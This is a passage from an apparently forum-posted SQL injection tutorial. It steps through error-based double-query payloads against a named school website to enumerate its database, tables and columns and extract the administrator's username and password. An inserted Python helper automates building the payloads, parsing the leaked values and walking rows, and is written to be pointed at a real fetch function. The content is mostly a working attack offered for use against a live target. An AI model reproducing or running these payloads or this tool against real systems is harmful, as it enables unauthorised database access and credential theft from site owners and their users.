We need to hex-encode the database name we just recorded and put 0x in front of it, so iqbal_iqbal becomes 0x697162616c5f697162616c (the hex is used instead of 'iqbal_iqbal' so the payload contains no quotes that the site might escape).
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php (or any hex converter; MySQL's own hex() function gives the same result)
Now that you've the database into hex, lets see what our address will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
LIMIT 19,1 brings us the valuable table which is "settings"
Review the code and study it
Step4: Getting Column names from specific Tables and Database
Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction
Here's what the query will look like:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now here we have 3 variables:
1. Hex code of the database name: hex the database, which in our case is iqbal_iqbal
2. Hex code of the table name: hex the table name, which is "settings"
3. LIMIT Function
Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.
Here's what the address is gonna look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the hexed variables and the LIMIT Function
Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"
Review what we have just done for less confusion
Step5: Getting the Data from the Columns with the help of Table name and Database name
Alright now that we know what we need to extract, lets get our goods
From what we've injected into the site so far, this is our information:
database name: iqbal_iqbal
table name: settings
column names: userName, passWord
Here's what the query will look like first (for extracting data):
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Variables:
table_name.column_name: Input the table name and column name you want to extract information from
database_name.table_name: Input the database name and table name you want to extract information from
LIMIT Function: Increment until you find the data you need
So here's what our address is gonna look like when we extract details from userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Code:
admim
Query for extracting details from passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
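To tie Steps 1 to 5 together, here's an added Python helper (my own addition, not part of the original tutorial) that builds each stage's double query payload from the inner SELECT, hex-encodes names the way Steps 3 and 4 need, and pulls the leaked value out of the "Duplicate entry" text. It makes no network requests: the page body it parses comes from a fake_fetch function with constructed responses (the schema list it returns is made up for the demo), and a real fetch would just be an HTTP GET of build_url(...). The site URL is the one used on this page.

```python
import re
from typing import Callable, List, Optional
from urllib.parse import quote

# Added example, not from the original tutorial. Builds the "double query"
# payloads from Steps 1-5 and parses the leaked value out of the error.
# No network access: fake_fetch below returns constructed page bodies.

BASE = "http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21"
DELIM = "0x7e,0x27"  # ~' ... '~ markers so the value is easy to find in the error


def wrap(inner_select: str) -> str:
    """Wrap an inner SELECT in the count(*)/floor(rand(0)*2)/group by shell."""
    return ("and(select 1 from(select count(*),concat((select (select "
            f"{inner_select}) from information_schema.tables limit 0,1),"
            "floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1")


def hexlit(s: str) -> str:
    """MySQL hex literal for a string, e.g. 'settings' -> 0x73657474696e6773."""
    return "0x" + s.encode().hex()


def payload_version() -> str:                       # Step 1
    return wrap(f"concat({DELIM},cast(version() as char),0x27,0x7e)")


def payload_schema(n: int) -> str:                  # Step 2
    return wrap(f"(SELECT distinct concat({DELIM},cast(schema_name as char),0x27,0x7e) "
                f"FROM information_schema.schemata LIMIT {n},1)")


def payload_table(db: str, n: int) -> str:          # Step 3
    return wrap(f"(SELECT distinct concat({DELIM},cast(table_name as char),0x27,0x7e) "
                f"FROM information_schema.tables Where table_schema={hexlit(db)} LIMIT {n},1)")


def payload_column(db: str, table: str, n: int) -> str:   # Step 4
    return wrap(f"(SELECT distinct concat({DELIM},cast(column_name as char),0x27,0x7e) "
                f"FROM information_schema.columns Where table_schema={hexlit(db)} "
                f"AND table_name={hexlit(table)} LIMIT {n},1)")


def payload_data(db: str, table: str, column: str, n: int) -> str:   # Step 5
    return wrap(f"(SELECT concat({DELIM},cast({table}.{column} as char),0x27,0x7e) "
                f"FROM `{db}`.{table} LIMIT {n},1)")


# The error echoes the group key: ~'<value>'~ followed by the 0/1 from floor(rand(0)*2).
LEAK_RE = re.compile(r"Duplicate entry '~'(.*?)'~[01]' for key 'group_key'")


def parse_leak(page_body: str) -> Optional[str]:
    """Return the value between ~' and '~ in a duplicate-entry error, or None."""
    m = LEAK_RE.search(page_body)
    return m.group(1) if m else None


def build_url(base: str, payload: str) -> str:
    """Append the payload to the injectable integer parameter, URL-encoded on one line."""
    return base + "%20" + quote(payload, safe="(),*=.'`")


def enumerate_values(fetch: Callable[[str], str], make_payload: Callable[[int], str],
                     max_rows: int = 100) -> List[str]:
    """Walk LIMIT n,1 from n=0 until the page no longer carries a leaked value.
    Past the last row the inner SELECT is NULL, the group key is NULL for every
    row, no duplicate occurs and the page renders normally."""
    found: List[str] = []
    for n in range(max_rows):
        value = parse_leak(fetch(make_payload(n)))
        if value is None:
            break
        found.append(value)
    return found


# Constructed stand-in for an HTTP GET: a made-up schema list for the demo.
FAKE_SCHEMAS = ["information_schema", "iqbal_iqbal"]


def fake_fetch(payload: str) -> str:
    m = re.search(r"LIMIT (\d+),1", payload)
    n = int(m.group(1)) if m else 0
    if n < len(FAKE_SCHEMAS):
        return f"<b>Warning</b>: Duplicate entry '~'{FAKE_SCHEMAS[n]}'~1' for key 'group_key'"
    return "<html>normal page, no error</html>"


if __name__ == "__main__":
    print(build_url(BASE, payload_version()))
    print(enumerate_values(fake_fetch, payload_schema))
```

payload_version() reproduces the Step 1 query character for character, and payload_table("iqbal_iqbal", 19) reproduces the Step 3 address, so the helper can be checked against the page before pointing it at a real fetch function.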
Alright, I think that's pretty much what you have to know about Error Based/Double Query SQL injection.
Just so that everything is as clear as possible, watch and learn from the video I made for you guys below:
Thank you guys for reading my tutorial and watching my video
Hope it helped you guys understand the concept of Error Based/Double Query SQL injection
End of Chapter 4
Upcoming Chapter: Detailed String Based SQL injection
Contact Me: zerofreak@live.com
Stay tuned on Zer0 MegaProjectSQLi for more tutorials
Have a great day